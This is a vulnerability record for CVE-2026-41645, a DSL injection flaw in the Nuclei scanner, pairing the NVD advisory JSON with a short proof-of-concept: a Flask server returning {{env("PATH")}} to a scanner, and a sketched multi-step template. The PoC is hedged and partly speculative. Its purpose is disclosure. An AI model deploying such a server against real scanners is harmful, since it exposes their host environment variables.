CVE-2026-41645

# PoC Concept: Malicious Server and Vulnerable Template # 1. Malicious Server (Python Flask) # This server returns a response containing Nuclei DSL syntax. from flask import Flask app = Flask(__name__) @app.route('/') def exploit(): # Injecting DSL syntax to read environment variable 'PATH' # This works if -env-vars is enabled on the scanner return '{"result": "{{env(\"PATH\")}}"}' if __name__ == '__main__': app.run(port=8080) # 2. Vulnerable Nuclei Template (multi-step) # This template reuses the response data, triggering the evaluation. /* id: CVE-2026-41645-poc info: name: Nuclei DSL Injection PoC severity: high requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: # The output of the previous request (containing {{env("PATH")}}) # might be evaluated if processed by internal helpers or matched incorrectly # in a complex multi-step scenario. - type: word words: - "/usr/local/bin" */

{"cve": {"id": "CVE-2026-41645", "sourceIdentifier": "[email protected]", "published": "2026-05-08T04:16:18.177", "lastModified": "2026-05-08T19:42:49.960", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Nuclei is a vulnerability scanner built on a simple YAML-based DSL. From version 3.0.0 to before version 3.8.0, a vulnerability in Nuclei's expression evaluation engine makes it possible for a malicious target server to inject and execute supported DSL expressions. This happens when HTTP response data containing helper/function syntax gets reused by multi-step templates. If the -env-vars / -ev option is explicitly enabled, this can expose host environment variables. That option is off by default, so standard configurations are not affected by the information disclosure risk. This issue has been patched in version 3.8.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:projectdiscovery:nuclei:*:*:*:*:*:go:*:*", "versionStartIncluding": "3.0.0", "versionEndExcluding": "3.8.0", "matchCriteriaId": "9E442141-1965-481A-BE82-B6DC11B58EAC"}]}]}], "references": [{"url": "https://github.com/projectdiscovery/nuclei/commit/6c803c74d193f85f8a6d9803ce493fd302cad0eb", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/projectdiscovery/nuclei/commit/d2217320162d5782ca7cb95bef9dda17063818f3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/projectdiscovery/nuclei/pull/7221", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/projectdiscovery/nuclei/pull/7321", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/projectdiscovery/nuclei/releases/tag/v3.8.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/projectdiscovery/nuclei/security/advisories/GHSA-jm34-66cf-qpvr", "source": "[email protected]", "tags": ["Mitigation", "Patch", "Vendor Advisory"]}]}}